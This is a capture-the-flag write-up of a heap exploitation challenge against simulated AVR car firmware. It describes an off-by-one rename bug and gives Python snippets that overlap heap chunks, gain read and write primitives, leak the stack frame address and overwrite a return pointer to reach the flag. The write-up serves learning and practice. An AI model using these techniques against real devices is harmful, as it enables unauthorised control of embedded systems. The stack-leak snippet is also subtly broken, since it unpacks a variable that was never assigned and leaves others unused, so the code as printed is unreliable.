Bluetooth Device Manager (200)


You have a basic car model and would like to enable some extra features? That navigation with traffic should be neat. Right. It is expensive, you know. Or not, if you can access the control interface. Try bluetooth this time. We think, it could be used for purposes other than making calls and playing MP3s.


Another one exploitation challenge, “such heap, much pr0!” strings in data section give a little hint that heap exploitation will be involved.

Firmware implements simple menu with creating, editing and deleting of objects, which are dynamically allocated on heap. If we will look closer to “Modify stored device” code you can notice that during rename new object isn’t allocated. Instead previously allocated null terminated string is reused with previous size limit. When I played with inputs I noticed that we can overwrite string termination byte and one byte next after device name, which is malloc header of next chunk, things becomes more interesting.

In avr-libc repository we can find how avr allocator is working, it’s quite simple comparing to allocator for x86.

Our goal here is to allocate structure with pointers to area that we can control and we can do it by manipulating chunk sizes, as the result we will have write and read primitive.

When we create new device 3 malloc call is invoked, one for device structure (0xb size) and two calls for key and name fields with variable size. Our strategy is to create two devices (dev0 and dev1) with shortest key and name fields, then free dev0 and create new dev2 with key longer than previous, in that case dev0 freed key chunk won’t fit new longer key and new chunk will be allocated right next to dev1 key. Next using “buggy” modify option we increase size of dev1 key chunk to 0xb (device structure size), as the result this chunk will overlap with dev2 key chunk, which content can modified. Now we free dev1 and create new dev3, as our prediction dev3 struct will be allocated on crafted overlapped chunk, name and key pointer will at our control which gives us read and write primitive:

    new_dev(tty,"a","b")             # dev 0
    new_dev(tty,"c","d")             # dev 1
    del_dev(tty,0)                   # free dev 0
    new_dev(tty,"e","ffffffffffff")  # dev2 with key chunk in the end
    edit_dev(tty,1,"z0\x0b","a")     # encrease dev1 key chunk
    del_dev(tty,1)                   # free dev 1
    new_dev(tty,"g","h")             # dev3 with overlapped chunk

Few things left to get the flag, to make proper jump we need to know dynamic stack frame size for main function, luckily it’s just stored at data section by 0x2192 address. Other thing is that we need to replace 0xDEADBEEF to 0xBAADF00D at 0x2000:

    edit_dev(tty,2,"x","\x01\x01\x01"+"\x01\x20") # set ptr to 0x2001
    edit_dev(tty,2,"x","\x01\x01\x01")            # set ptrl to 0x00 via null terminator
    edit_dev(tty,3,"g",struct.pack("I",0xBAADF00D)+"\xa0\x08\x40\x06\x04\x08\x04\x20") #write 0xbaadf00d and serial config to avoid corruption
    print repr(print_all(tty))
    edit_dev(tty,2,"x","\x01\x01\x01"+struct.pack("H",0x2192))  # set ptr to 0x2192
    buff=print_all(tty)                           # leak leak stack frame address
    dl="key: "
    sp=struct.unpack("H",sp)[0]                  # extracting stack frame address
    print "stack frame base:", hex(sp)

    print edit_dev(tty,3,"g",struct.pack(">H",0x182)) # set return pointer to 0x182, big endian! - flag print

After everything is done properly you will be rewarded with next 200 points. Full script can be found among files in github repository.